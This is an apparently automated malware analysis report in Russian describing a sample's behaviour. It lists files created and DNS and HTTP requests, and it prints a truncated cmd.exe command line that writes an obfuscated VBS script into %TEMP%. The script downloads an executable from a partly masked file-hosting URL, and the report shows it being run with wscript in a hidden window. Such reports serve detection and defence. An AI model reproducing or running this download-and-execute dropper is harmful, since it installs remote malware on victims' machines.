Техническая информация
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\cmd.exe' /c cd %TEMP% & @ECHO T1p= "https://www.up##ad.ee/download/11863601/4c7b1412c9a0176936c4/tst.exe">>D6t.VBS &@ECHO B0q = M0o("]SO;ReR")>>D6t.VBS &@ECHO Set T5q = CreateObject(M0o("Z`eZY?;eZYUaa]"...
Изменения в файловой системе
Создает следующие файлы
- %TEMP%\d6t.vbs
Сетевая активность
TCP
Запросы HTTP GET
- http://st####.rapidssl.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBRhhZrQET0hvbSHUJmNfBKqR%2FiT7wQUU8oXWfxrwAMhLxqu5KqoHIJW2nUCEAffP8uXPz%2BbuVistZM%2BMKI%3D
- http://cd#.##pidssl.com/RapidSSLRSACA2018.crl
UDP
- DNS ASK up##ad.ee
- DNS ASK st####.rapidssl.com
- DNS ASK cd#.##pidssl.com
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\wscript.exe' "%TEMP%\D6t.VBS"
- '<SYSTEM32>\cmd.exe' /c cd %TEMP% & @ECHO T1p= "https://www.up##ad.ee/download/11863601/4c7b1412c9a0176936c4/tst.exe">>D6t.VBS &@ECHO B0q = M0o("]SO;ReR")>>D6t.VBS &@ECHO Set T5q = CreateObject(M0o("Z`eZY?;eZYUaa]"...' (со скрытым окном)
